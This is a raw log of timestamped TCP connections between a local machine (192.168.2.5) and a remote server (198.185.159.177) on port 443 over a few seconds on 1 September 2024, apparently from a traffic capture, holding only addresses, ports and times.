Sep 1, 2024 22:05:04.122982979 CEST	443	49877	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.123039961 CEST	49877	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.123291969 CEST	49877	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.123303890 CEST	443	49877	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.140842915 CEST	49876	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.140857935 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.141205072 CEST	49878	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.141212940 CEST	443	49878	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.141272068 CEST	49878	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.141514063 CEST	49878	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.141525030 CEST	443	49878	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.145946026 CEST	443	49875	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.146127939 CEST	49875	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.146133900 CEST	443	49875	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.246537924 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.246854067 CEST	49876	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.246874094 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.246922970 CEST	49876	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.246931076 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.247065067 CEST	49876	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.247081995 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.247189045 CEST	49876	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.247201920 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.247318029 CEST	49876	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.247328043 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.247412920 CEST	49876	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.247425079 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.247509003 CEST	49876	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.247520924 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.247627974 CEST	49876	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.247639894 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.247653961 CEST	49876	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.247658014 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.280949116 CEST	443	49875	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.281008959 CEST	443	49875	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.281059027 CEST	49875	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.281626940 CEST	49875	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.282322884 CEST	49879	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.282341003 CEST	443	49879	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.282397985 CEST	49879	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.282601118 CEST	49879	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.282609940 CEST	443	49879	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.561388016 CEST	443	49877	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.563373089 CEST	49877	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.563390970 CEST	443	49877	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.580321074 CEST	443	49878	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.582211971 CEST	49878	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.582226992 CEST	443	49878	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.591193914 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.591248989 CEST	443	49876	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.591415882 CEST	49876	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.591717958 CEST	49876	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.593348026 CEST	49880	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.593364000 CEST	443	49880	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.593517065 CEST	49880	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.593873024 CEST	49880	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.593883991 CEST	443	49880	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.695931911 CEST	443	49877	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.696326971 CEST	49877	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.696335077 CEST	443	49877	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.707410097 CEST	443	49878	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.708014011 CEST	49878	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.708019972 CEST	443	49878	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.732326984 CEST	443	49879	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.734504938 CEST	49879	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.734517097 CEST	443	49879	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.798373938 CEST	443	49877	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.798450947 CEST	443	49877	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.798512936 CEST	49877	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.799050093 CEST	49877	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.807544947 CEST	49881	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.807559013 CEST	443	49881	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.807710886 CEST	49881	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.807955027 CEST	49881	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.807965994 CEST	443	49881	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.834141016 CEST	443	49878	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.834229946 CEST	443	49878	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.834347963 CEST	49878	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.835057974 CEST	49878	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.837107897 CEST	49882	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.837116003 CEST	443	49882	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.837315083 CEST	49882	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.837558985 CEST	49882	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.837569952 CEST	443	49882	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.868751049 CEST	443	49879	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:04.884066105 CEST	49879	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:04.884073973 CEST	443	49879	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.029035091 CEST	443	49879	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.029088974 CEST	443	49879	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.029264927 CEST	49879	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.030070066 CEST	49879	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.030318975 CEST	49883	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.030339003 CEST	443	49883	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.030608892 CEST	49883	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.030608892 CEST	49883	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.030628920 CEST	443	49883	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.062211037 CEST	443	49880	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.063822985 CEST	49880	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.063838005 CEST	443	49880	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.184191942 CEST	443	49880	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.184451103 CEST	49880	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.184461117 CEST	443	49880	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.257215023 CEST	443	49881	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.263825893 CEST	49881	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.263849020 CEST	443	49881	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.282768011 CEST	443	49882	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.284610033 CEST	49882	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.284624100 CEST	443	49882	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.312274933 CEST	443	49880	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.312347889 CEST	443	49880	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.312463999 CEST	49880	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.313020945 CEST	49880	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.314553022 CEST	49884	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.314579010 CEST	443	49884	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.314652920 CEST	49884	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.314974070 CEST	49884	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.314989090 CEST	443	49884	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.389061928 CEST	443	49881	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.389439106 CEST	49881	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.389448881 CEST	443	49881	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.420322895 CEST	443	49882	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.420612097 CEST	49882	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.420619011 CEST	443	49882	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.509824991 CEST	443	49883	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.513200998 CEST	49883	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.513221979 CEST	443	49883	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.527523041 CEST	443	49881	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.527600050 CEST	443	49881	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.527648926 CEST	49881	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.528110027 CEST	49881	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.546919107 CEST	49885	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.546942949 CEST	443	49885	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.547152042 CEST	49885	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.547811031 CEST	49885	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.547822952 CEST	443	49885	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.563906908 CEST	443	49882	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.563981056 CEST	443	49882	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.564033985 CEST	49882	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.564445019 CEST	49882	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.609467030 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.609482050 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.609544992 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.610138893 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.610152006 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.652340889 CEST	443	49883	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.654269934 CEST	49883	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.654278994 CEST	443	49883	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.753068924 CEST	443	49884	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.766612053 CEST	49884	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.766643047 CEST	443	49884	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.796304941 CEST	443	49883	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.796371937 CEST	443	49883	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.796489954 CEST	49883	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.796938896 CEST	49883	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.797233105 CEST	49887	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.797260046 CEST	443	49887	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.797316074 CEST	49887	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.797552109 CEST	49887	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.797564030 CEST	443	49887	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.861134052 CEST	443	49884	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.861455917 CEST	49884	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.861464977 CEST	443	49884	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.989238024 CEST	443	49884	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.989315033 CEST	443	49884	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.989382982 CEST	49884	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:05.994503021 CEST	443	49885	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:05.998153925 CEST	49884	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.016164064 CEST	49885	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.016184092 CEST	443	49885	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.028901100 CEST	49888	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.028953075 CEST	443	49888	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.029012918 CEST	49888	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.031219959 CEST	49888	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.031232119 CEST	443	49888	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.086721897 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.129106045 CEST	443	49885	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.160130978 CEST	49885	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.160141945 CEST	443	49885	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.176491022 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.300632954 CEST	443	49885	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.300698996 CEST	443	49885	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.300759077 CEST	49885	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.301204920 CEST	49885	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.303637981 CEST	49889	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.303668022 CEST	443	49889	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.303746939 CEST	49889	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.304275036 CEST	49889	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.304285049 CEST	443	49889	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.367765903 CEST	443	49887	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.499000072 CEST	443	49888	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.535846949 CEST	49887	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.547002077 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.547017097 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.580269098 CEST	49888	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.580293894 CEST	443	49888	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.650661945 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.654850006 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.654879093 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.654937029 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.654943943 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.655213118 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.655230045 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.655653000 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.655666113 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.655833960 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.655841112 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.655900002 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.655910015 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.656105995 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.656119108 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.656263113 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.656275988 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.678384066 CEST	443	49888	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.684376955 CEST	49888	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.684405088 CEST	443	49888	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.684990883 CEST	49888	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.685003996 CEST	443	49888	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.685095072 CEST	49888	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.685161114 CEST	443	49888	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.685262918 CEST	49888	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.685272932 CEST	443	49888	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.685291052 CEST	443	49888	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.704616070 CEST	49887	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.704637051 CEST	443	49887	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.747320890 CEST	443	49889	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.748809099 CEST	49889	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.748836994 CEST	443	49889	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.800965071 CEST	443	49887	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.801161051 CEST	49887	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.801170111 CEST	443	49887	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.879216909 CEST	443	49889	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.879439116 CEST	49889	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.879456043 CEST	443	49889	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.946772099 CEST	443	49887	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.946832895 CEST	443	49887	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.947014093 CEST	49887	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.947632074 CEST	49887	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.948398113 CEST	49890	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.948442936 CEST	443	49890	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.948601007 CEST	49890	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.950499058 CEST	49890	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.950535059 CEST	443	49890	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.951035023 CEST	49890	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.951078892 CEST	49891	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.951118946 CEST	443	49891	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.951203108 CEST	49891	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.951400995 CEST	49891	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.951412916 CEST	443	49891	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.952155113 CEST	49891	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.952935934 CEST	49892	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.952944040 CEST	443	49892	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.953121901 CEST	49892	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.953329086 CEST	49892	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:06.953335047 CEST	443	49892	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:06.992503881 CEST	443	49891	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.004621983 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.004707098 CEST	443	49886	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.004946947 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.005078077 CEST	49886	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.006550074 CEST	49893	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.006581068 CEST	443	49893	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.006649017 CEST	49893	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.006875992 CEST	49893	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.006886005 CEST	443	49893	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.023216009 CEST	443	49889	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.023282051 CEST	443	49889	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.023864985 CEST	49889	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.026407003 CEST	443	49888	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.026472092 CEST	443	49888	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.026711941 CEST	49888	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.026961088 CEST	49888	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.027462959 CEST	49894	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.027475119 CEST	443	49894	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.027545929 CEST	49894	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.027746916 CEST	49894	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.027755976 CEST	443	49894	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.094192028 CEST	49889	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.094997883 CEST	49895	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.095026016 CEST	443	49895	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.095204115 CEST	49895	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.095474958 CEST	49895	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.095489025 CEST	443	49895	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.402595997 CEST	443	49891	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.402695894 CEST	443	49891	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.402698994 CEST	49891	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.402838945 CEST	49891	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.420639038 CEST	443	49892	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.420736074 CEST	49892	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.422462940 CEST	49892	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.422470093 CEST	443	49892	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.422729015 CEST	443	49892	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.424237013 CEST	49892	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.464507103 CEST	443	49892	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.496615887 CEST	443	49893	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.498462915 CEST	49893	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.498486996 CEST	443	49893	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.517911911 CEST	443	49894	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.519644022 CEST	49894	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.519660950 CEST	443	49894	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.554080009 CEST	443	49892	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.574301004 CEST	49892	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.574323893 CEST	443	49892	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.580723047 CEST	443	49895	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.580791950 CEST	49895	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.582683086 CEST	49895	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.582690001 CEST	443	49895	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.582976103 CEST	443	49895	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.601876974 CEST	49895	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.641220093 CEST	443	49893	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.641505003 CEST	49893	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.641531944 CEST	443	49893	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.648505926 CEST	443	49895	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.650109053 CEST	443	49894	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.674688101 CEST	49894	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.674710035 CEST	443	49894	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.707407951 CEST	443	49895	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.707588911 CEST	49895	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.707604885 CEST	443	49895	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.712800026 CEST	443	49892	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.712871075 CEST	443	49892	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.712912083 CEST	49892	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.713432074 CEST	49892	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.713715076 CEST	49896	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.713737965 CEST	443	49896	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.713798046 CEST	49896	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.714257956 CEST	49896	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.714268923 CEST	443	49896	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.778466940 CEST	443	49893	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.778532982 CEST	443	49893	198.185.159.177	192.168.2.5
Sep 1, 2024 22:05:07.778584957 CEST	49893	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.778943062 CEST	49893	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.779392004 CEST	49897	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:05:07.779418945 CEST	443	49897	198.185.159.177	192.168.2.5
